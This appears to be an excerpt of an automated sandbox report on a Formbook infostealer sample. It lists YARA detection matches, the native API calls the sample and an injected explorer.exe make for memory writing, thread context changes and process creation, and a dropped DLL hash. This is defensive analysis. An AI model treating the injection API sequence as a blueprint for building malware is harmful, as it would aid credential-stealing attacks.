          Source: 1.2.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.AQJEKNHnWK.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.AQJEKNHnWK.exe.1eef0000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.AQJEKNHnWK.exe.1eef0000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.AQJEKNHnWK.exe.1eef0000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.AQJEKNHnWK.exe.1eef0000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_004181C0 NtCreateFile,1_2_004181C0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00418270 NtReadFile,1_2_00418270
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_004182F0 NtClose,1_2_004182F0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_004183A0 NtAllocateVirtualMemory,1_2_004183A0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_004182EA NtClose,1_2_004182EA
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_0041839A NtAllocateVirtualMemory,1_2_0041839A
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00AA98F0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00AA9860
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9840 NtDelayExecution,LdrInitializeThunk,1_2_00AA9840
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA99A0 NtCreateSection,LdrInitializeThunk,1_2_00AA99A0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00AA9910
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9A20 NtResumeThread,LdrInitializeThunk,1_2_00AA9A20
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00AA9A00
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9A50 NtCreateFile,LdrInitializeThunk,1_2_00AA9A50
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA95D0 NtClose,LdrInitializeThunk,1_2_00AA95D0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9540 NtReadFile,LdrInitializeThunk,1_2_00AA9540
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00AA96E0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00AA9660
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00AA97A0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9780 NtMapViewOfSection,LdrInitializeThunk,1_2_00AA9780
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9FE0 NtCreateMutant,LdrInitializeThunk,1_2_00AA9FE0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9710 NtQueryInformationToken,LdrInitializeThunk,1_2_00AA9710
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA98A0 NtWriteVirtualMemory,1_2_00AA98A0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9820 NtEnumerateKey,1_2_00AA9820
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AAB040 NtSuspendThread,1_2_00AAB040
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA99D0 NtCreateProcessEx,1_2_00AA99D0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9950 NtQueueApcThread,1_2_00AA9950
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9A80 NtOpenDirectoryObject,1_2_00AA9A80
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9A10 NtQuerySection,1_2_00AA9A10
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AAA3B0 NtGetContextThread,1_2_00AAA3B0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9B00 NtSetValueKey,1_2_00AA9B00
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA95F0 NtQueryInformationFile,1_2_00AA95F0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9520 NtWaitForSingleObject,1_2_00AA9520
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AAAD30 NtSetContextThread,1_2_00AAAD30
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9560 NtWriteFile,1_2_00AA9560
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA96D0 NtCreateKey,1_2_00AA96D0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9610 NtEnumerateValueKey,1_2_00AA9610
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9670 NtQueryInformationProcess,1_2_00AA9670
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9650 NtQueryValueKey,1_2_00AA9650
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9730 NtQueryVirtualMemory,1_2_00AA9730
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AAA710 NtOpenProcessToken,1_2_00AAA710
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9760 NtOpenProcess,1_2_00AA9760
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA9770 NtSetInformationFile,1_2_00AA9770
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AAA770 NtOpenThread,1_2_00AAA770
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_004181C0 NtCreateFile,1_1_004181C0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_00418270 NtReadFile,1_1_00418270
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_004182F0 NtClose,1_1_004182F0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_004183A0 NtAllocateVirtualMemory,1_1_004183A0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_004182EA NtClose,1_1_004182EA
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_0041839A NtAllocateVirtualMemory,1_1_0041839A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049795D0 NtClose,LdrInitializeThunk,7_2_049795D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979540 NtReadFile,LdrInitializeThunk,7_2_04979540
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049796D0 NtCreateKey,LdrInitializeThunk,7_2_049796D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049796E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_049796E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979650 NtQueryValueKey,LdrInitializeThunk,7_2_04979650
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_04979660
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979780 NtMapViewOfSection,LdrInitializeThunk,7_2_04979780
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979FE0 NtCreateMutant,LdrInitializeThunk,7_2_04979FE0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979710 NtQueryInformationToken,LdrInitializeThunk,7_2_04979710
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979840 NtDelayExecution,LdrInitializeThunk,7_2_04979840
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979860 NtQuerySystemInformation,LdrInitializeThunk,7_2_04979860
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049799A0 NtCreateSection,LdrInitializeThunk,7_2_049799A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_04979910
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979A50 NtCreateFile,LdrInitializeThunk,7_2_04979A50
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049795F0 NtQueryInformationFile,7_2_049795F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0497AD30 NtSetContextThread,7_2_0497AD30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979520 NtWaitForSingleObject,7_2_04979520
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979560 NtWriteFile,7_2_04979560
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979610 NtEnumerateValueKey,7_2_04979610
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979670 NtQueryInformationProcess,7_2_04979670
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049797A0 NtUnmapViewOfSection,7_2_049797A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0497A710 NtOpenProcessToken,7_2_0497A710
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979730 NtQueryVirtualMemory,7_2_04979730
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0497A770 NtOpenThread,7_2_0497A770
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979770 NtSetInformationFile,7_2_04979770
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979760 NtOpenProcess,7_2_04979760
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049798A0 NtWriteVirtualMemory,7_2_049798A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049798F0 NtReadVirtualMemory,7_2_049798F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979820 NtEnumerateKey,7_2_04979820
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0497B040 NtSuspendThread,7_2_0497B040
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049799D0 NtCreateProcessEx,7_2_049799D0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979950 NtQueueApcThread,7_2_04979950
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979A80 NtOpenDirectoryObject,7_2_04979A80
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979A10 NtQuerySection,7_2_04979A10
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979A00 NtProtectVirtualMemory,7_2_04979A00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979A20 NtResumeThread,7_2_04979A20
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0497A3B0 NtGetContextThread,7_2_0497A3B0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04979B00 NtSetValueKey,7_2_04979B00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004F81C0 NtCreateFile,7_2_004F81C0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004F8270 NtReadFile,7_2_004F8270
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004F82F0 NtClose,7_2_004F82F0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004F83A0 NtAllocateVirtualMemory,7_2_004F83A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004F82EA NtClose,7_2_004F82EA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004F839A NtAllocateVirtualMemory,7_2_004F839A
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040314A
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 0_2_004046A70_2_004046A7
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_0040102C1_2_0040102C
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_0041B8811_2_0041B881
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_0041C10F1_2_0041C10F
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_0041A2A61_2_0041A2A6
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_0041BC411_2_0041BC41
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00408C5C1_2_00408C5C
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00408C601_2_00408C60
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_0041CEF61_2_0041CEF6
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A920A01_2_00A920A0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B320A81_2_00B320A8
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7B0901_2_00A7B090
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B328EC1_2_00B328EC
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B3E8241_2_00B3E824
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B210021_2_00B21002
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A841201_2_00A84120
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6F9001_2_00A6F900
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B322AE1_2_00B322AE
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9EBB01_2_00A9EBB0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2DBD21_2_00B2DBD2
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B203DA1_2_00B203DA
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B32B281_2_00B32B28
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7841F1_2_00A7841F
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2D4661_2_00B2D466
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A925811_2_00A92581
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7D5E01_2_00A7D5E0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B325DD1_2_00B325DD
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A60D201_2_00A60D20
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B32D071_2_00B32D07
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B31D551_2_00B31D55
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B32EF71_2_00B32EF7
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A86E301_2_00A86E30
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2D6161_2_00B2D616
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B31FF11_2_00B31FF1
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B3DFCE1_2_00B3DFCE
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_0040102C1_1_0040102C
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_004010301_1_00401030
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_0041B8811_1_0041B881
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_0041C10F1_1_0041C10F
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_0041A2A61_1_0041A2A6
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_0041BC411_1_0041BC41
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_00408C5C1_1_00408C5C
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_1_00408C601_1_00408C60
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0494841F7_2_0494841F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049FD4667_2_049FD466
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049625817_2_04962581
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0494D5E07_2_0494D5E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A025DD7_2_04A025DD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A02D077_2_04A02D07
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04930D207_2_04930D20
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A01D557_2_04A01D55
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A02EF77_2_04A02EF7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049FD6167_2_049FD616
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04956E307_2_04956E30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A01FF17_2_04A01FF1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0494B0907_2_0494B090
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A020A87_2_04A020A8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049620A07_2_049620A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A028EC7_2_04A028EC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F10027_2_049F1002
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0493F9007_2_0493F900
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049541207_2_04954120
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A022AE7_2_04A022AE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496EBB07_2_0496EBB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049FDBD27_2_049FDBD2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A02B287_2_04A02B28
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004FA2A67_2_004FA2A6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004E8C5C7_2_004E8C5C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004E8C607_2_004E8C60
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004E2D907_2_004E2D90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004FCEF67_2_004FCEF6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_004E2FB07_2_004E2FB0
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll 6C4628D2A5D9FE67953D21A7AB0FF49BAC94B69FB32B5A1FA94AE8CB71A4D693
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 0493B150 appears 35 times
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: String function: 00419F70 appears 34 times
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: String function: 0041A0A0 appears 50 times
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: String function: 00A6B150 appears 35 times
          Source: AQJEKNHnWK.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: AQJEKNHnWK.exe, 00000000.00000003.207038845.000000001F036000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs AQJEKNHnWK.exe
          Source: AQJEKNHnWK.exe, 00000001.00000002.256332303.0000000000B5F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs AQJEKNHnWK.exe
          Source: AQJEKNHnWK.exe, 00000001.00000002.257477540.0000000002A0E000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXEj% vs AQJEKNHnWK.exe
          Source: AQJEKNHnWK.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.AQJEKNHnWK.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
